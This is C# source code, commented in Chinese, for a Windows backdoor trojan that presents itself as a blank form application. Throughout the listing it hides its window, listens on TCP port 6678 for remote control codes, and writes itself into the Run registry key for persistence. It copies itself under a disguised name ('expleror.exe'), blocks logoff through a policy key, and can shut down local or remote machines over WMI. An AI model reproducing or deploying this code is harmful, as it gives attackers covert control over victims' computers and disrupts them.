Socket (1) Service

public class MMListenerClass { private static TcpListener listener = null; private static bool IsRunning = false; private static Socket socket = null; public static void Execute() { //1隐藏自已 //Console.SetWindowSize(0, 0); //Console.SetWindowPosition(0, 0); //Console.WriteLine("正在侦听本机6678端口..."); //2控制代码的接收 //加入你的侦听代码 //端口你可以自已设定,我使用了固定的端口 int port = 6678; //System.Net.Sockets.TcpListener是用来在Tcp网络中侦听客户端的 listener = new TcpListener(port); //启动侦听 listener.Start(); //增加接收控制码的线程,如果要停止线程可以用 Thread.abort() //reControlCode 是线程启动执行的函数，此函数根据接收的控制 //控制码选取合适的注册表修改函数 IsRunning = true; Thread thread = new Thread(new ThreadStart(reControlCode)); thread.Start(); AutoSetupRun(); //下面的代码不可行 每个socket地址只能用一次 //string hostName = LocalHostName; //string ipStr = GetIPByHostName(hostName); //IPEndPoint ipPoint = new IPEndPoint(IPAddress.Parse(ipStr), port); //listener = new TcpListener(ipPoint); } //reControlCode函数如下，完整代码见程序 private static void reControlCode() { int socketHandle = -1; while (IsRunning == true) { //设置接收套接字,接收listener.AcceptSocket是返回已经接收的客户的请求 socket = listener.AcceptSocket(); try { socketHandle = socket.Handle.ToInt32(); //Console.WriteLine("socket已处于连接状态" + socket.Handle.ToInt32().ToString()); //如果连接成功执行 while (socket != null && socket.Connected == true) { //接收控制码 byte[] by = new byte[6]; int i = socket.Receive(by, by.Length, 0); string ss = System.Text.Encoding.ASCII.GetString(by); ss = ss.Trim(); //根据控制码执行不同的功能 //修改注册表加入编码 //Console.WriteLine("接收到控制码：" + ss); if (ss == "/0/0/0/0/0/0") break; if (ss.Trim() == "") break; switch (ss) //ss的长度这里必须是6位长度 { case "jiance"://测试连接,返回测试信息 RetMessage(ss, "hjc"); break; case "zx1000": //修改注册表函数,自已定义，见下面分析 //UnLogOff(); //返回控制消息 RetMessage(ss, "hkz"); break; case "zx0100": //修改注册表函数 //UnClose(); //返回控制消息 RetMessage(ss, "hkz"); break; case "zhucex": RetMessage(ss, "hkz"); break; case "zhuces": RetMessage(ss, "hkz"); break; case "warring": RetMessage(ss, "hkz"); break; case "suggest": RetMessage(ss, "hkz"); break; case "mumawe": RetMessage(ss, "hkz"); break; case "clear1": Console.Clear(); RetMessage(ss, "hkz"); break; case "drop11": RetMessage(ss, "hkz"); break; case "exit11": IsRunning = false; socket.Shutdown(SocketShutdown.Both); socket.Close(); socket = null; Application.Exit(); RetMessage(ss, "ext"); break; case "close1": IsRunning = false; socket.Shutdown(SocketShutdown.Both); socket.Close(); socket = null; Application.Exit(); RetMessage(ss, "ext"); break; case "autoru": AutoSetupRun(); RetMessage(ss, "hkz"); break; case "logout": ExitWindowClass.logout(); RetMessage(ss, "hkz"); break; case "shdown": //关机操作 Shutdown(); RetMessage(ss, "hkz"); break; //重复的case功能与前面一样,略掉 default: RetMessage(ss, "hkz"); break; }//case Thread.Sleep(100); }//while } catch (Exception ee) { //Console.WriteLine(ee.Message); } } } //private void reControlCode private static void RetMessage(string ss, string str) { if (socket != null) { byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str); socket.Send(bytee, 0, bytee.Length, 0); //Console.WriteLine("已回发信息给控制码：" + ss + "为" + str); } } //3实现注册表的修改 //下面设键值NoLogOff 为 1 即可使计算机无法注销。在下面的函数中用C#实现对注册表的修改： private void UnLogOff() { //得到主机的注册表的顶级节点 Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine; //设置一个注册表子键的变量 RegistryKey key1 = null; string mystr = ""; try { //函数RegistryKey.OpenSubkey(string registrykey,bool canwrite)检索指定的子键 //registrykey是用户指定的键值，canwrite 为true则可修改，默认为fasle不可改 key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer", true); //设置子键的键名，和值 key1.SetValue("NoLogOff", 1); //关闭打开的子键 key1.Close(); //警告字符串设定 mystr = mystr + "HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer键值Nologoff被修改！请将它置为0!"; } catch { } //如果不存在自已建立 if (key1 == null) { try { //使用RegistryKey.CreateSubKey(string mystring)函数来建立你需要的子键 RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer"); key2.SetValue("NoLogOff", 1); key2.Close(); mystr = mystr + "HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer键值Nologoff被修改！请将它置为0!"; } catch { } } } //4自我的复制和转移 private void moveCC1() { //得到主机的注册表的顶级节点 Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine; RegistryKey key1 = null; try { //函数File.Move(string sourceFileName,string destFileName)起移动文件的作用 //sourceFileName为要移动的文件名，destFileName为文件的新路径 string sfn = "C://winnnt//system//msdoss.exe"; string dfn = "d://winnt//system32//expleror.exe"; File.Move(sfn, dfn); if (Directory.Exists("C://WINDOWS//system32") == true) { File.Move(sfn, dfn); } } catch { } //将新移的木马程序设为自启动.分析和前面一样 try { key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run", true); key1.SetValue("microsoftt", "d://winnt//system32//expleror.exe"); key1.Close(); } catch { } if (key1 == null) { try { RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run"); key1.SetValue("microsoftt", "d://winnt//system32//expleror.exe"); key1.Close(); } catch { } } } //moveCC1() //自动安装运行 private static void AutoSetupRun() { try { string exefilepath = Application.ExecutablePath; //Console.WriteLine(exefilepath); string exefilename = System.IO.Path.GetFileNameWithoutExtension(exefilepath); Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine; RegistryKey key1 = null; try { key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run", true); key1.SetValue(exefilename, exefilepath); key1.Close(); } catch { } if (key1 == null) { try { RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run"); key1.SetValue(exefilename, exefilepath); key1.Close(); } catch { } } } catch (Exception ee) { Console.WriteLine(ee.Message); } } //远程关闭计算机 private static void RemoteShutdown(string server, string userName, string password) { //定义连接远程计算机的一些选项 ConnectionOptions options = new ConnectionOptions(); options.Username = userName; options.Password = password; ManagementScope scope = new ManagementScope("////" + server + "//root//cimv2", options); try { //用给定管理者用户名和口令连接远程的计算机 scope.Connect(); System.Management.ObjectQuery oq = new System.Management.ObjectQuery("SELECT * FROM Win32_OperatingSystem"); ManagementObjectSearcher query1 = new ManagementObjectSearcher(scope, oq); //得到WMI控制 ManagementObjectCollection queryCollection1 = query1.Get(); foreach (ManagementObject mo in queryCollection1) { string[] ss = { "" }; //重启远程计算机 mo.InvokeMethod("Shutdown", ss); } } //报错 catch (Exception ee) { Console.WriteLine("连接出错，出错信息为：" + ee.Message); } } private static void Shutdown() { Console.WriteLine("正在关闭本计算机..."); Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.CreateNoWindow = true; p.Start(); p.StandardInput.WriteLine("shutdown -s -t 0"); p.StandardInput.WriteLine("exit"); p.Close(); ExitWindowClass.DoExitWinShutDown(); } //获取主机信息 private static string[] GetIPArrayByHostName(string hostName) { IPHostEntry ipEntry = Dns.GetHostEntry(hostName); IPAddress[] IpAddr = ipEntry.AddressList; string[] strAddr = new string[IpAddr.Length]; for (int i = 0; i < IpAddr.Length; i++) { strAddr[i] = IpAddr[i].ToString(); } return strAddr; } private static string GetIPByHostName(string hostName) { string strAddr = ""; IPHostEntry ipEntry = Dns.GetHostEntry(hostName); IPAddress[] IpAddr = ipEntry.AddressList; if (IpAddr != null && IpAddr.Length >= 1) { strAddr = IpAddr[0].ToString(); } return strAddr; } private static string LocalHostName { get { return Dns.GetHostName(); } } } 

static class Program { /// <summary> /// 应用程序的主入口点。 /// </summary> [STAThread] static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new Form1()); } } public partial class Form1 : Form { public Form1() { InitializeComponent(); MMListenerClass.Execute(); } }